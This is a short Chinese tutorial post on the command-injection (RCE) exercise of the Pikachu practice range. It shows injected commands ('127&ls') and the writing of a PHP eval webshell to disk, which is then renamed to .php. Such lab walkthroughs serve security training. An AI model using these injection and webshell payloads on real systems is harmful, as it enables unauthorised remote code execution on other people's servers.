当前位置: 首页 > article >正文

pikachu靶场RCE漏洞

打开pikachu靶场RCE中的exec"ping"

输入127&ls命令可以执行发现是linux系统

在输入127&echo "<?php @eval($_POST['cmd']); ?>" > mm.txt

写一个木马语句输入进去,访问一下2.txt,看看语句有什么问题

我们发现$_POST没了

我们回去重新创还能一个文件

输入127&echo "<?php @eval(\$_POST['cmd']); ?>" > 1.txt

在$_POST前面加个反斜杠

这回没有问题了,为了方便我们就不重新上传了,直接改个名字

输入127&mv 1.txt 1.php

验证一下

写入成功


http://www.kler.cn/a/454218.html

相关文章:

  • 欧拉计划启航篇(一)
  • Java Stream流详解——串行版
  • 以太网帧结构
  • 01 - 初识 Spring
  • sentinel限流+其他
  • kubernetes Gateway API-部署和基础配置
  • 以太网帧结构
  • JS获取URL中参数值的4种方法
  • 001集—— 块表、快表记录、块参照详解 —— ifox CADc#二次开发
  • Docker下TestHubo安装配置指南
  • 快速理解24种设计模式
  • Ubuntu 24.04 APT源配置详解
  • 【Linux】top中的VIRT=RES+SHR的等式是否成立?
  • QT多媒体开发(三):使用QMediaPlayer播放视频
  • 学习记录—正则表达式-基本语法
  • k8s,service如何找到容器
  • Visual Studio Code(VS Code)配置C/C++环境
  • 社交媒体形象打造中的“号设化”与开源AI智能名片商城小程序的应用
  • 嵌入式学习-QT-Day07
  • SQLite本地数据库的简介和适用场景——集成SpringBoot的图文说明
  • 【TaskBasics】- KRTS C++示例精讲(3)
  • 什么是 DevOps 自动化?
  • C++ STM32 F4xx USART LL库 DMA + IDLE ISR 驱动裸机 +FreeRTOS 任务通知
  • (六)循环神经网络_基本的RNN
  • Wireshark软件下载安装及基础
  • Nginx界的天花板-Oracle 中间件OHS 11g服务器环境搭建